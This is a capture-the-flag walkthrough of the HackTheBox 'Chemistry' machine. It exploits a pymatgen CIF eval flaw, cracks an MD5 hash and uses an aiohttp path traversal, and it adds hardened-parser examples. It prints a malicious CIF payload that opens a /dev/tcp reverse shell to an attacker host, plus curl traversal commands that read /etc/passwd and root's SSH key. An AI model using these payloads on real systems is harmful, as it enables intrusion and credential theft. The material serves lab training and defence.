Chemistry Walkthrough — HackTheBox
An Easy Linux Machine

Introduction
In this write-up, we’ll explore an easy Linux machine on which we gain an initial foothold by exploiting a CVE, then enumerate the machine and exploit another CVE to achieve root access.
Note:
This box was very slow and unstable, so be patient and retry repeatedly to get things done on this machine. Try pinging it. Maybe my VPN is slow, but I'm sharing this anyway, since I experienced a bad connection.
Reconnaissance
1. After starting the machine, I set my target IP in the $target environment variable and ran the Nmap command.
Command — Port Scan: Nmap
sudo nmap $target -sC --top-ports=1000 -sV -v -Pn -O > nmap.out

2. Then, as usual, I added the host chemistry.htb to /etc/hosts.
3. On port 5000 there is a website: a CIF file analyzer.
What is a CIF file?
A CIF (Crystallographic Information File) is the standard text format, maintained by the International Union of Crystallography, for storing crystallographic structural data. It is part of the broader Crystallographic Information Framework, a family of data-exchange standards for crystallography. Because the format is parsed by scientific libraries rather than web frameworks, the parser itself is the attack surface of a site like this one.

4. After registration, there was a CIF file upload dashboard with an example file hosted there.

5. I downloaded that example file and uploaded it to see how it gets processed.

6. Clicking the 'View' button shows the crystallographic information.

7. Viewing the CIF file with 'cat' shows the data below.

8. Let's do a basic Google search for CIF file vulnerabilities.

9. The first link seemed interesting; visiting it showed the following.

Initial Foothold
1. Learn about the exploit at this link.
CVE-2024-23346 Description
CVE-2024-23346 is a critical vulnerability in the pymatgen library, affecting versions prior to 2024.2.20. The flaw allows arbitrary code execution because the parse_transformation_string() method passes the transformation string (the 'a,b,c;0,0,0' value after _space_group_magn.transform_BNS_Pp_abc) to eval(). There is no sanitization of the transformation string, so any Python expression in it is evaluated when the CIF is parsed.
2. Reviewing the PoC in the article and in the GitHub repository above, the line below in the CIF file walks from a tuple literal to object's subclasses, loads the os module through the built-in importer, and runs a shell command with os.system():
if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'
3. To test this vulnerability, I tried to run the 'whoami' command with the code below.
if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("whoami");0,0,0'
4. But it didn't work, and then I figured out that we can't see the output, since the command's output isn't sent anywhere.
5. However, this still executes code on the machine, so I tried a reverse shell payload.
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/<attacker-ip>/4444 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
6. Let's upload this file to the dashboard and start a listener on our side.
7. Clicking the 'View' button on the dashboard gives us the shell.

8. Now, as the 'app' user, we don't have many permissions.
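To show the bug class behind the CVE in isolation, here is an added example that is not pymatgen's code and not from this write-up. vulnerable_parse() has the shape of the affected parse_transformation_string(): it splits the 'basis;shift' string and eval()s each component with a restricted __builtins__. A constructed payload (SANDBOX_ESCAPE) uses the same sandbox-escape technique as the CIF line above, walking object's subclasses to reach the os module, but calls os.getpid() instead of os.system(), so escape_executes() proves that code runs without doing harm. safe_parse() is a replacement that parses the a,b,c / number / fraction grammar with regular expressions and fractions and never evaluates input, and check_cif() applies it to an uploaded file before it reaches any parser. The function names, the simplified unit-tuple vectors and the sample CIF are assumptions of the example.

```python
"""Vulnerable vs. hardened parsing of a CIF transformation string.

Added example, not pymatgen's code: vulnerable_parse() has the shape of the
pre-2024.2.20 parse_transformation_string(); safe_parse() never evaluates input.
"""
import os
import re
from fractions import Fraction


def vulnerable_parse(transformation_string="a,b,c;0,0,0"):
    """eval() each component of 'basis;shift' with a restricted __builtins__.

    Empty builtins block names such as __import__, but not an attribute walk
    starting from a literal: ().__class__.__base__.__subclasses__() reaches
    every loaded class, and from there any module. (a, b, c are plain unit
    tuples here; pymatgen uses numpy rows.)
    """
    scope = {"a": (1, 0, 0), "b": (0, 1, 0), "c": (0, 0, 1)}
    basis_change, origin_shift = transformation_string.split(";")
    rows = [eval(x, {"__builtins__": {}}, scope) for x in basis_change.split(",")]
    shift = [eval(x, {"__builtins__": {}}, {}) for x in origin_shift.split(",")]
    return rows, shift


# Constructed payload: same escape technique as the CIF line above, but it
# calls os.getpid() instead of os.system(). os._wrap_close is a class defined
# in os.py, so its __init__.__globals__ is the os module namespace.
SANDBOX_ESCAPE = (
    'a,b,[k for k in ().__class__.__base__.__subclasses__() '
    'if k.__name__ == "_wrap_close"][0].__init__.__globals__["getpid"]();0,0,0'
)

# Constructed minimal CIF carrying that payload on the magnetic-group tag.
MALICIOUS_CIF = (
    "data_Example\n_cell_length_a 10.00000\n"
    "_space_group_magn.transform_BNS_Pp_abc '%s'\n" % SANDBOX_ESCAPE
)


def escape_executes():
    """True when eval() ran attacker code: the third 'vector' is our PID."""
    rows, _ = vulnerable_parse(SANDBOX_ESCAPE)
    return rows[2] == os.getpid()


# Hardened replacement: accept only the a,b,c / number / fraction grammar.
_ALLOWED = re.compile(r"[abc0-9+\-*/.]+")
_TERM = re.compile(r"([+-]?)(\d+(?:\.\d+)?(?:/\d+)?)?\*?([abc])?")
_AXIS = {"a": 0, "b": 1, "c": 2}


def _parse_expr(expr):
    """'a-b+1/2' -> ([1, -1, 0], 1/2): coefficients of a,b,c and a constant."""
    expr = expr.replace(" ", "")
    if not _ALLOWED.fullmatch(expr):
        raise ValueError(f"illegal characters in {expr!r}")
    terms = re.findall(r"[+-]?[^+-]+", expr)
    if "".join(terms) != expr:  # catches '--', trailing '+', etc.
        raise ValueError(f"malformed expression {expr!r}")
    coeffs, const = [Fraction(0)] * 3, Fraction(0)
    for term in terms:
        m = _TERM.fullmatch(term)
        if m is None or (m[2] is None and m[3] is None):
            raise ValueError(f"malformed term {term!r}")
        value = Fraction(m[2]) if m[2] else Fraction(1)
        if m[1] == "-":
            value = -value
        if m[3]:
            coeffs[_AXIS[m[3]]] += value
        else:
            const += value
    return coeffs, const


def safe_parse(transformation_string="a,b,c;0,0,0"):
    """Return (P, p): three coefficient rows and a three-component shift."""
    parts = transformation_string.split(";")
    if len(parts) != 2:
        raise ValueError("expected 'basis;shift' with exactly one ';'")
    basis, shift = parts[0].split(","), parts[1].split(",")
    if len(basis) != 3 or len(shift) != 3:
        raise ValueError("expected three basis expressions and three shifts")
    P, p = [], []
    for expr in basis:
        coeffs, const = _parse_expr(expr)
        if const != 0:
            raise ValueError(f"basis expression {expr!r} has a constant")
        P.append(coeffs)
    for expr in shift:
        coeffs, const = _parse_expr(expr)
        if any(coeffs):
            raise ValueError(f"shift {expr!r} must be a pure number")
        p.append(const)
    return P, p


def is_safe(transformation_string):
    try:
        safe_parse(transformation_string)
        return True
    except ValueError:
        return False


def check_cif(cif_text):
    """Return the transformation-string lines of a CIF that fail the grammar."""
    bad = []
    for line in cif_text.splitlines():
        tag, _, value = line.strip().partition(" ")
        if tag == "_space_group_magn.transform_BNS_Pp_abc":
            if not is_safe(value.strip().strip("'\"")):
                bad.append(line.strip())
    return bad
```

The point of the hardened half is that restricting builtins is not a sandbox: anything that evaluates attacker text needs to be replaced by a parser for the expected grammar, and a web front end that hands uploads to such a library should validate the fields it knows are dangerous before parsing, as check_cif() does.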
Lateral Movement
i. User Flag
1. While checking the folders in the '/home' directory, I found another user directory, 'rosa'. Checking which files were available in the 'app' home directory, I found a database file.
Command — Database file dump: sqlite3
sqlite3 /home/app/instance/database.db .dump

2. There is an unsalted MD5 hash for the user 'rosa'. MD5 cannot be decrypted, but a fast unsalted hash can be cracked against a wordlist; let's try with John.
Command — Crack MD5 hash: john
john user.hash --wordlist=/mnt/HDD1/VM\ files/kali/wordlists/rockyou.txt --format=raw-md5
3. I found the password for ‘rosa’ and SSHed into the server as ‘rosa’.
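An added example (not the page's john command) of the same attack in Python: parse_dump() picks username/hash pairs out of constructed lines shaped like sqlite3's .dump output (the user table name and column layout are an assumption; the real schema is not shown above), and crack_md5() does what john's raw-md5 mode does, one MD5 per wordlist entry reused across every account. hash_password() and verify_password() show the salted, slow storage that would have turned this lookup into a per-user brute force. The wordlist and both passwords are constructed for the example.

```python
"""Cracking an unsalted MD5 password hash taken from a sqlite3 .dump.

Added example; the dump lines, wordlist and schema are constructed.
"""
import hashlib
import hmac
import os
import re

# Constructed dump lines shaped like `sqlite3 database.db .dump` output.
DUMP = "\n".join([
    "CREATE TABLE user (id INTEGER NOT NULL, username VARCHAR(150), "
    "password VARCHAR(150), PRIMARY KEY (id));",
    "INSERT INTO user VALUES(1,'admin','%s');"
    % hashlib.md5(b"correct horse battery").hexdigest(),
    "INSERT INTO user VALUES(2,'rosa','%s');"
    % hashlib.md5(b"summer2024").hexdigest(),
])
WORDLIST = ["123456", "password", "summer2024", "letmein"]  # stand-in for rockyou

_INSERT = re.compile(r"INSERT INTO user VALUES\(\d+,'([^']*)','([0-9a-f]{32})'\);")


def parse_dump(dump):
    """Return {username: md5_hex} from the INSERT lines of a dump."""
    return dict(_INSERT.findall(dump))


def crack_md5(hashes, wordlist):
    """Hash the wordlist once and look every user up in it.

    Unsalted hashes let the attacker amortise the whole wordlist across all
    accounts; with rockyou this is seconds of work on a laptop.
    """
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: lookup.get(h) for user, h in hashes.items()}


# What the application should have stored instead: a per-user salt and a
# memory-hard KDF, so each guess costs real work for each user separately.
def hash_password(password, salt=None):
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex, _ = stored.split("$")
    candidate = hash_password(password, bytes.fromhex(salt_hex))
    return hmac.compare_digest(candidate, stored)
```

Note that crack_md5() never needs the salt-free hash to be "decrypted"; it only needs the password to appear in the wordlist, which is why a wordlist hit on a web app's user table is so common.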

ii. Root Flag
1. Now we have low-privileged user access. I am unable to run sudo -l as the 'rosa' user.
2. Let's check which ports are listening using 'netstat'.
Command — Listing listening network connections: netstat
netstat -tnl

3. There is another service listening on port 8080 on localhost only. Let's forward it through an SSH tunnel.
Command — Forwarding service using SSH tunnel: ssh
ssh -L 4000:localhost:8080 rosa@chemistry.htb
4. Run this command on your local (attacker) machine. It forwards the service listening on port 8080 on chemistry.htb to port 4000 on our machine.
5. Visiting localhost:4000, we find the dashboard below.

Command — Find Website underlying technology and server detail: whatweb
whatweb localhost:4000

6. Let's search for vulnerabilities in 'aiohttp/3.9.1'.

7. It seems we can exploit this machine using CVE-2024-23334.
CVE-2024-23334 Description
CVE-2024-23334 is a directory traversal vulnerability in the Python aiohttp framework, fixed in 3.9.2, that is exploitable when the follow_symlinks option is enabled on a static route. In that mode the handler resolved the requested path but skipped the check that it still lies under the static directory, so a URL with '..' segments can read any file the server process can.
8. Reviewing the exploit on GitHub, the traversal is only reachable through a static route, so let's brute-force directories to find one.
Command — Directory Busting: gobuster
gobuster dir -u http://localhost:4000/ -w /mnt/HDD1/VM\ files/kali/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

9. Reading the exploit, any of the paths below can trigger the traversal, depending on how deep the static directory sits:
/assets/../etc/passwd
/assets/../../etc/passwd
/assets/../../../etc/passwd
/assets/../../../../etc/passwd
and so on. Note the --path-as-is flag in the curl command below: without it, curl collapses the '..' segments client-side and the server never sees them.
Command — Path Traversal exploit using curl: curl
curl -s --path-as-is "http://localhost:4000/assets/../../../etc/passwd"

10. Let's grab the id_rsa file from root's home directory.
Command — Getting id_rsa file using curl: curl
curl -s --path-as-is "http://localhost:4000/assets/../../../../root/.ssh/id_rsa"

11. Now I have root's SSH private key, which can be used to get root access (set the saved key file to mode 600 first, or ssh will refuse to use it).
Command — SSH as Root: ssh
ssh -i id_rsa root@chemistry.htb
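An added example, not aiohttp's code: resolve_vulnerable() and resolve_fixed() model the static handler's path logic before and after the 3.9.2 fix (the upstream code differs in detail), exercised against a constructed temporary tree in which a symlink inside the static root points at a file outside it, standing in for the id_rsa read above. The request '../secret.txt' is what the handler sees when curl is run with --path-as-is; demo() records whether each resolver serves the file, and from where, or returns 404.

```python
"""Path resolution behind CVE-2024-23334 (aiohttp static routes).

Added example, not aiohttp's code: models the handler's logic before and
after the fix, on a constructed temporary directory tree.
"""
import os
import tempfile
from pathlib import Path


def resolve_vulnerable(root: Path, filename: str, follow_symlinks: bool) -> Path:
    """Pre-fix shape: resolve first, check containment only when symlinks
    are not followed. With follow_symlinks=True nothing stops '..'."""
    filepath = root.joinpath(filename).resolve()
    if not follow_symlinks:
        filepath.relative_to(root)  # ValueError -> 404
    return filepath


def resolve_fixed(root: Path, filename: str, follow_symlinks: bool) -> Path:
    """Post-fix shape: normalise the *unresolved* path and require it to stay
    under root; only then follow symlinks, which may legitimately leave root."""
    unresolved = root.joinpath(filename)
    if follow_symlinks:
        normalized = Path(os.path.normpath(unresolved))
        normalized.relative_to(root)  # '..' escapes are rejected here
        return normalized.resolve()
    filepath = unresolved.resolve()
    filepath.relative_to(root)
    return filepath


def build_fixture(tmp: Path) -> Path:
    """Constructed tree: a static root with a real asset and a symlink to a
    file outside the root (stands in for /root/.ssh/id_rsa)."""
    root = tmp / "static"
    root.mkdir()
    (root / "app.js").write_text("console.log('hello')\n")
    secret = tmp / "secret.txt"
    secret.write_text("-----BEGIN OPENSSH PRIVATE KEY----- (constructed)\n")
    (root / "link.txt").symlink_to(secret)
    return root


def demo():
    """Try each resolver in both modes against a traversal, a symlink and a
    normal file. Values: '404', 'served:inside' or 'served:outside'."""
    outcomes = {}
    with tempfile.TemporaryDirectory() as d:
        root = build_fixture(Path(d).resolve())
        # '../secret.txt' is what reaches the handler from
        #   curl --path-as-is http://host/assets/../secret.txt
        for name, resolver in (("vulnerable", resolve_vulnerable),
                               ("fixed", resolve_fixed)):
            for follow in (False, True):
                for req in ("../secret.txt", "link.txt", "app.js"):
                    try:
                        target = resolver(root, req, follow)
                        where = "inside" if target.is_relative_to(root) else "outside"
                        outcomes[(name, follow, req)] = "served:" + where
                    except ValueError:
                        outcomes[(name, follow, req)] = "404"
    return outcomes


if __name__ == "__main__":
    for key, value in sorted(demo().items()):
        print(key, value)
```

The fixed resolver still serves link.txt from outside the root when follow_symlinks is on, because that is the documented purpose of the option; what it refuses is a request path that escapes the root before any symlink is consulted. That is the distinction the vulnerable version collapsed.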

Now, We are ROOT! Thanks for Reading. Happy hacking!!